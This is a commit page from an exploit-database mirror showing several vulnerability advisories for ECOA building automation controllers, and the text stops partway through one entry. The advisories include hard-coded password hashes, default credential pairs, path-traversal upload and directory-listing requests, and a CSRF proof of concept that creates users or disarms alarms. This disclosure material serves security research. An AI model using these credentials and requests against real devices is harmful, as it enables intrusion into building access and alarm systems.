bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-09-14

Browse source 
18 changes to exploits/shellcodes

Active WebCam 11.5 - Unquoted Service Path
ECOA Building Automation System - Missing Encryption Of Sensitive Information
Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai

ECOA Building Automation System - Hard-coded Credentials SSH Access
Men Salon Management System 1.0 - Multiple Vulnerabilities
ECOA Building Automation System - Weak Default Credentials
ECOA Building Automation System - Path Traversal Arbitrary File Upload
ECOA Building Automation System - Directory Traversal Content Disclosure
ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
ECOA Building Automation System - Cookie Poisoning Authentication Bypass
ECOA Building Automation System - Configuration Download Information Disclosure
ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function
ECOA Building Automation System - Remote Privilege Escalation
ECOA Building Automation System - Local File Disclosure
ECOA Building Automation System - Arbitrary File Deletion
Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE

Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
This commit is contained in:
Offensive Security 2021-09-14 05:02:12 +00:00
parent 99b8f09213
commit 629e350774
20 changed files with 2015 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

109
exploits/hardware/local/50283.txt Normal file
View file

@ -0,0 +1,109 @@
# Exploit Title: ECOA Building Automation System - Missing Encryption Of Sensitive Information
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Missing Encryption Of Sensitive Information
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller stores sensitive data (backup exports) in clear-text.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5676
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5676.php
25.06.2021
--
Missing Encryption of Sensitive Information
-------------------------------------------
- Data stored on the system is not protected/encrypted.
sql_[DATE]linux.dat reveals clear-text password from backup.
Excerpt from DB:
Insert into userlist (userid,userpwd,userClass,userfrm,duetime,modidate,userMenu,usertel,usermobil,usermail,gpname,userCname,usergrp) values (?,?,?,?,?,?,?,?,?,?,?,?,?)%%2%%1user%%3user%%312%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1guest%%3guest%%31%%3%%30%%320100630133229%%3null%%3%%3%%3%%3%%3%%3%%3%%1humex%%3humex4377

114
exploits/hardware/remote/50282.txt Normal file
View file

@ -0,0 +1,114 @@
# Exploit Title: ECOA Building Automation System - Hard-coded Credentials SSH Access
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Hard-coded Credentials SSH Access
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller is vulnerable to hard-coded credentials within its Linux distribution image.
These sets of credentials are never exposed to the end-user and cannot be changed through any
normal operation of the device.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5675
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5675.php
25.06.2021
--
Hard-coded Credentials / Remote SSH Access
------------------------------------------
- Exercise for the nation-state actors and actresses.
root:$1$ILT0V4Sf$AR4nYzAFri3Cqi2BwFD/h.:16183:0:99999:7:::
user:$1$pJefShJL$CoX8T20vn1g.ug0jZIczM.:11851:0:99999:7:::
webs:$1$ZP8rifJj$8Nq6pvZfZleSOM1NxQAck0:::::::
admin:$1$7BGOwUYp$dgzOcdE9eXPmxZ0PomIOR0:::::::
ecoa:$1$Ux/uar1o$RlMzoY0I7KEMkmNzDqzFz1:-5835:0:99999:7:::
humex:$1$1v5rveDi$bXRhL1q20wpYM5vo3aZ050:-5877:0:99999:7:::
guest:$1$Zb9DELKT$IK8/EnLI8o0G36kjjBjWj1:6845:0:99999:7:::

117
exploits/hardware/webapps/50275.txt Normal file
View file

@ -0,0 +1,117 @@
# Exploit Title: ECOA Building Automation System - Weak Default Credentials
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Weak Default Credentials
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller uses weak set of default administrative credentials that can be easily guessed
in remote password attacks and gain full control of the system.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5668
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php
25.06.2021
--
Default / Weak Credentials
--------------------------
- Attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System.
Credentials:
guest:guest
user:user
admin:admin
root:embed
embed:power
administrator:empty
humex:humex4377
ecoa:ecoa4377

123
exploits/hardware/webapps/50276.txt Normal file
View file

@ -0,0 +1,123 @@
# Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Path Traversal Arbitrary File Upload
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller suffers from an arbitrary file write and directory traversal vulnerability.
Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location
and content type and gain the possibility to execute arbitrary code on the affected device.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5669
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php
25.06.2021
--
Directory Traversal / File Path Traversal / Unrestricted File Upload
--------------------------------------------------------------------
- Abusing the 'filename' and 'rbt' POST parameter, attacker can navigate outside current directory and write files in arbitrary location.
- There is no validation on file content, file extension and file location.
Request:
POST /ebd-bin/upload HTTP/1.1
Host: 192.168.1.3:8080
------WebKitFormBoundaryvxy2zFDs1Z69pfRB
Content-Disposition: form-data; name="rbt"
ecsfile
------WebKitFormBoundaryvxy2zFDs1Z69pfRB
Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext"
Content-Type: application/octet-stream
ANY_CONTENT_HERE
------WebKitFormBoundaryvxy2zFDs1Z69pfRB--

144
exploits/hardware/webapps/50277.txt Normal file
View file

@ -0,0 +1,144 @@
# Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Directory Traversal Content Disclosure
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the
GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the
affected device.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5670
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
25.06.2021
--
Directory Traversal Content Disclosure
--------------------------------------
- Abysing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks.
- cpath=.
- cpath=../../../../../../../etc
Request:
GET /fmangersub?cpath=/ HTTP/1.1
Host: 192.168.1.3:8080
bacevent.elf
redown.elf
system.bin
webnewc.elf
err.txt
hole.elf
modbustcp.elf
ianplc.bin
hitachi.el
bacser.elf
root.pem
pwsd.bin
server.lst
symtbl.tbl
client.pem
gb-unicode.bin
httpser.elf
namelst.bin
AI.tbl
BI.tbl
AV.tbl
BV.tbl
mstplalf
rthost.elf
big5-unicode.bin
version.bin
modbus.elf
rbdev.bin
rbdlc.elf
powercrd.elf

122
exploits/hardware/webapps/50278.txt Normal file
View file

@ -0,0 +1,122 @@
# Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Cross-Site Request Forgery
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
RiskBuster provide a truly cost effective solution for any building automation or high level
integration application. A truly Ethernet network compliant feature allows the RiskBuster to
be install anywhere in the building.
#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for
Building Automate System; Environment control system; HVAC control system and other types of
equipment. Being fully programmable it ensures complete application versatility, allowing
specific products to be created according to customer requests. This controller is a configurable
unitary controller based on the 32bit series microcomputer, with an on-board clock, have two
RS-485 local bus.
#4 The ECS0000160 is a Router Controller for building and industry products based on various
microprocessors. It not only accessing information but also monitoring and controlling across
Internet directly. The ECS0000160 can totally replace and improve a typical system that always
has tedious panel and complex working process. An obviously benefit to our customers is that
ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed
to connect with singular specific operating system. It's like a whole package, which provides
browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all
through web-pages operating, which works base on standard transmission Internet protocol. The
ECS0000160 provides a low industry cost. A truly friendly network interface which is simple
and easy to apply on factory floors. It supports from serial ports with options of RS485.
#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden
installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A
conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional,
integral and differential (P+I+D) and dead-zone control to control accurately. The controller
features contains the sensing system, proportional control systems, computing modules, control
modules, alarm detection system, and so on. It mainly used in building control, plant monitoring,
air monitoring, lighting and power control, the use of premises for buildings, factories, offices,
conference rooms, restaurants, hotels, etc.
Desc:
The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. These actions can be exploited to
perform any CRUD operation like user creation, alarm shutdown and account password change with
administrative privileges if a logged-in user visits a malicious web site.
Tested on: EMBED/1.0
Apache Tomcat/6.0.44
Apache Tomcat/6.0.18
Windows Server
MySQL Version 5.1.60
MySQL Version 4.0.16
Version 2.0.1.28 20180628
Vulnerability discovered by Neurogenesia
@zeroscience
Advisory ID: ZSL-2021-5671
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php
25.06.2021
--
Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm
----------------------------------------------------------------------
- CSRF exist in entire solution for any CRUD operation.
PoC:
<html>
<body>
<form action="http://192.168.1.3:8080/usersave" method="POST">
<input type="hidden" name="bk" value="&#45;1" />
<input type="hidden" name="edtText" value="" />
<input type="hidden" name="comText" value="19" />
<input type="hidden" name="delrow" value="" />
<input type="hidden" name="hiddenText" value="user&#1;user&#1;19&#1;&#1;&#2;guest&#1;guest&#1;10&#1;&#1;&#2;root&#1;embed&#1;19&#1;&#1;&#2;admin&#1;admin&#1;19&#1;&#1;&#2;" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

121
exploits/hardware/webapps/50279.txt Normal file
View file

@ -0,0 +1,121 @@
# Exploit Title: ECOA Building Automation System - Cookie Poisoning Authentication Bypass
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw
ECOA Building Automation System Cookie Poisoning Authentication Bypass
Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
ECOA RiskBuster Terminator - E6L45
ECOA RiskBuster System - RB 3.0.0
ECOA RiskBuster System - TRANE 1.0
ECOA Graphic Control Software
ECOA SmartHome II - E9246
ECOA RiskTerminator
Summary:
#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are
designed to provide you with the latest in the Human Machine Interface (HMI) technology,
for completely monitoring and controlling management. It may be used singly for small and
medium sized facilities, could be linked together via the high-speed Ethernet to other
servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more
sophisticated applications. The Risk-Terminator practice Web basic conception that with
operation simply and conveniently, totally share risk and make sure of security. Even
remote sites may be controlled and monitored through Ethernet port, which base on standard
transferring protocol like XML, Modbus TCP/IP or BACnet or URL.
#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP
networking technologies. It incorporates an embedded web server that can deliver user-specific
web pages to any PC or mobile terminal running internet browser software. A user with an
appropriate security codes can made adjustment or monitor the network control unit form
any internet access point in the world. It also provides network management, integration
and process control functions for any existing or new building controllers and microprocessor
based equipments or system in buildings. The management function provided by the RiskBuster
such as trend log and alarm generation improves building controllers and microprocessor
based equipments or system management and audit trail capabilities. The integration function
provided by the RiskBuster allows seamless integration such as information sharing (read/write)
between building controllers and microprocessor based equipments or system without any need
of major upgrade or equipments replacement and allow cost saving. The process control functions
provided by the RiskBuster allow global control action to be implemented across any building
controllers and microprocessor based equipments or system to allow full building control. The
